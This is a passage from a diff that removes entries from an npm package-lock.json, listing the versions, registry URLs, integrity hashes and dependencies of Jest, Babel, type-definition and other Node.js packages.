"sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", - "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.0.tgz", - "integrity": "sha512-gv3ZRaISU3fjPAgNsriBRqGWQL6quFx04YMPW/zD8XMLsU32mhCCbfbO6KZFLjvYpCZ8zyDEgqsgf+PwPaM7GQ==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "dependencies": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" - } - }, - "node_modules/@nodelib/fs.scandir": { - "version": "2.1.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", - "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", - "dev": true, - "peer": true, - "dependencies": { - "@nodelib/fs.stat": "2.0.5", - "run-parallel": "^1.1.9" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/@nodelib/fs.stat": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", - "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 8" - } - }, - "node_modules/@nodelib/fs.walk": { - "version": "1.2.8", - "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", - "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", - "dev": true, - "peer": true, - "dependencies": { - "@nodelib/fs.scandir": "2.1.5", - "fastq": "^1.6.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", - "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.3.tgz", - "integrity": "sha512-NQn7AHQnk/RSLOxrBbGyJM/aVQ+pjj5HCgasFxc0K/KhoATfQ/47AyUl15I2yBUpihjmas+a+VJBOqecrFH+uA==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", - "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "dependencies": { - "undici-types": "~6.20.0" - } - }, - "node_modules/@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", - "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.33", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", - "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.3", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.3.tgz", - "integrity": "sha512-I4q9QU9MQv4oEOz4tAHJtNz1cwuLxn2F3xcc2iV5WdqLPpUnj30aUuxt1mAxYTG+oe8CZMV/+6rU4S4gRDzqtQ==", - "dev": true - }, - "node_modules/acorn": { - "version": "8.9.0", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.9.0.tgz", - "integrity": "sha512-jaVNAFBHNLXspO543WnNNPZFRtavh3skAkITqD0/2aeMkKZTN+254PyhwxFYrk3vQ1xfY+2wbesJMs/JC8/PwQ==", - "dev": true, - "peer": true, - "bin": { - "acorn": "bin/acorn" - }, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "peerDependencies": { - "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" - } - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-escapes/node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": 